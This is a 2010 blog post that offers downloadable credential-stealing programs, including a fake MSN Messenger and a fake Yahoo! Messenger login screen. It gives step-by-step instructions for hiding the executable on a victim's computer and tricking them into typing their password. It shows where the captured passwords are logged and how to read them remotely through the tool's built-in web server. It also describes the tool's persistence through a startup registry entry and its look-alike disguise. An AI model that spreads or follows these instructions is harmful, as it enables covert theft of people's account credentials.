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Monday, December 13, 2010

Best Hacking Tools - 85 in 1

YahooHack! NEW !

2shared - download YahooHack!.exe

Fake MSN Messenger Version 4.6 (4.6.0077) by The_Law

If you want to take anyones sign-in name and password, this is it, just use this fake Messenger to let him think that he is using the real one.

How does it Work:
just run the "fakemsn.exe" file and the fake messenger screen will appear (it will looks like the real one) click on the Click here to sign-in and let the victim type his sign-in name and password then click OK, an error message will appear, and thats it.

How to get the password:

just open "C:\program files\folder.log" and you will find that every sign-in name and password is recorded on that text file (you can open it with any normal text viewer like NOTEPAD.exe)

2shared - download fakemsn.exe

to open the real about Fake MSN Messenger type in the sign-in name field "about" and in the password field "fmsn" (without qoutes) and then click ok.

Very Special Thanks to giz and anyone alse who helped me to continue this.

-= Fake Yahoo! Messenger Login Screen =-
._ _.
~ expl0it_shad0w ~


o0 - Table Of Contents - 0o

-= Section 1 =-

A> Introduction
B> Instructions
C> Features
D> Known Bugs/Issues
E> Contacting Me


-= Section 1,A =-



Theres alot of Fake Login Screens for Yahoo! out there. But Ive tried to make one as real lookign as possible.
Its got lots of features that others dont, aswell as both remote and physical log file access.

There are allso draw backs which are listed below under 1C. This version has been tested with win 9x only.
If you want to test with Xp or ME then its up to you, but theres no telling what could happen.


-= Section 1,B =-



Follow these instructions.

1> Place The filename "YPager.exe" any where on there system ( HINT: somewhere hidden ).

2> Open it up and get the user to login/ or wait untill they login. The program does the rest.

( You can use both physical and remote log file access to see what user/pass the user has entered.
You need to use an Internet Browser, like MSIE )

< Physical Access >

There are 2 ways of doing this.
1. Viewing the RAW log file with note pad. The file with the recorded passwords is, c:\windows\yloginwin32.htm
NOTE: You will allso see c:\windows\YPager.exe allso exists just leave this here.

2. When you open the Fake Yahoo! Messenger Login Screen you will see a text box, with Search Yahoo! inside it,
just remove this text and type in "c-cure" without the quotes then hit search. This will show you all
recorded user/pass's on the computer.

< Remote Access >

Connect to there machine on port 80 with an Internet browser. Type in there IP address into
it and just hit Enter. For example if the victims IP address was you type in cPanel or

NOTE: There ip will not be so dont put it in. Its just an example.


-= Section 1,C =-



* Ive delayed the application startup-time like the real Yahoo! Messenger has.
* Ive added a trayicon, which allows you to control the fake login screen like the real-thing.
* When you open Fake YPager.exe it copies itself to the windows directory and then starts the HTTP server.
* Added HTTP server for remote access.
* The application has all the same images/graphics as the real one.
* When the victim types in his username/password Fake YPager.exe displays an error then loads the real YPager.
* Added a reg string to make Fake YPager.exe load up on windows start ( Better Remote Access ).
* The preferences can also be changed like the real thing. ( NOTE: They do nothing tho... ).
* Fake error messaages are shown, when the user clicks for help.
* Added the correct file,version,copyright information when you choose the files properties.


-= Section 1,D =-


Known Bugs/Issues

As allways there are certain things you should be aware of. If you have any more probs give me feedback.
All the problems below are being worked on, for the next release.

* The Fake YPager.exe Icon in the tray is not the real one used.
* The Main form can not be resized as of yet.
* The Main form allways starts in the middle of the screen.
* All other forms, are placed in the same location as the main form, onced shown.
* The Search Yahoo! text box, takes 2 clicks to get rid of it, as the real one takes 1.
* The Status bar, on the fake one doesnet have the icon used in the real one.

The above problems are not exactly noticable, but certain users could guess it is a fake.

Know of any more? Give me feedback. And any help is welcome, providing the person/groups that are giving help
know and use delphi well...

2shared - download fakeypager.zip

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